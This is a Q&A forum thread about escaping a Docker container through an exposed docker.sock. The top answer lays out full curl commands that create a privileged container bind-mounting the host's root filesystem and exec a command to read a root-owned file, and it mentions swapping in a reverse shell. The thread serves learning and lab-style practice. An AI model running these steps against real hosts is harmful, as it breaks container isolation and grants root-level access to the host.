# Docker: Not able to read local file system

Tags: docker

I am inside the container, and I am trying to learn escaping from container to host. So I create a vulnerable environment, on which the container is having `/var/run/docker.sock' file inside the container to make API calls.

So I tried to create a container which will mount the path source `/` to container `/host` directory. `/` as this contains the whole file system.

```
curl -X POST -H "Content-Type: application/json" --unix-socket /run/docker.sock -d '{"Image":"ubuntu:latest", "Cmd":["cat", "/host/etc/passwd"], "Mounts":[{"Type":"bind", "Source":"/", "Target":"/host"}]}' "http://localhost/containers/create?name=escaping"
```

I start the container

```
curl -X POST --unix-socket /run/docker.sock "http://localhost/containers/escaping/start"
```

when I checked the logs by using this

```
curl --output - --unix-socket /run/docker.sock "http://localhost/containers/escaping/logs?stdout=true"
```

As you can see, I was cat the `/etc/passwd` file in the first command, So I thought i would get the host file contents, but when I checked the contents, those were very first containers file content from which I was running the CURL command.

So what am i missing here?

Comment: You said that the socket is on `/var/run/docker.sock` in your container but your curl commands point to `/run/docker.sock` ? Did I miss something?

Answer (score 1):

### Api versioning

Ok so, one thing you have to keep in mind is that docker's API changed a lot, especially concerning **volumes**. How do you deal with this? the same way you would deal with **any other REST API** interfacing issue: find the version's documentation. First thing you need to check is the API version

```
curl -X GET --unix-socket /var/run/docker.sock http://127.0.0.1/version
```

### Read host's files

For this example:

- I'll stick to [v.1.40](https://docs.docker.com/engine/api/v1.40/#tag/Container) (**have a look at doc**)
- I want to read host's `/root/root.txt`.
- There a docker image available on the system called `sandbox:latest`
- I'll mount the entire host's `/` on the containers `/mnt`

#### Create a container with a volume from the host

```
curl -X POST --unix-socket /var/run/docker.sock "http://127.0.0.1/containers/create?name=toto" -d '{"Image":"sandbox:latest", "Cmd":["/usr/bin/tail", "-f", "1234", "/dev/null"], "Volumes":{"/mnt":{}}, "Privileged": true, "HostConfig": {"Binds": ["/:/mnt"]}}' -H "Content-Type: application/json"
```

gives you a `$container-id`. The tricky part is this `HostConfig` field not well documented

```
{  ...
   "Volumes":{"/mnt":{}}, 
   "HostConfig": {"Binds": ["/:/mnt"]}
   ...
}
```

Then start your container

```
curl  --unix-socket /var/run/docker.sock "http://127.0.0.1/containers/${container-id}/start?name=toto" -X POST -H "Content-Type: application/json"
```

#### Execute your command

```
curl -X POST --unix-socket /var/run/docker.sock "http://127.0.0.1/containers/${container-id}/exec" -d '{ "AttachStdin": false, "AttachStdout": true, "AttachStderr": true, "Cmd": ["/bin/sh", "-c", "cat /mnt/root/root.txt"]}' -H "Content-Type: application/json"
```

This gives you an `$execution-id`. You'll then be able to

```
curl -X POST -H "Content-Type: application/json" --unix-socket /var/run/docker.sock "http://127.0.0.1/exec/${execution-id}/start" -d '{}' --output -
```

Et voilà (`--output -` is only here so that `curl` does not freak out because of plain binary). Instead of a `cat`, you could create a reverse shell (same idea)

### Debugging

Just like any other system, to debug, have a look at [the logs](https://docs.docker.com/engine/api/v1.40/#operation/ContainerLogs)

```
curl -X GET --unix-socket /var/run/docker.sock "http://127.0.0.1/containers/${container-id}/logs?stdout=true"
```

Answer (score 0):

I'd start by saying you're making things a bit tough for yourself by doing this with curl rather than the docker CLI (it's a good thing to learn though)

So I think your problem here is that you've cat'd `/etc/passwd` inside the container, rather than `/host/etc/passwd` remember you're mounting the host filesystem with `/host` as a base, so you need to prepend that path to any files you're looking to get access to.

Comment: I think he was in a situation were `docker` cli was not available (it rarely is in containers)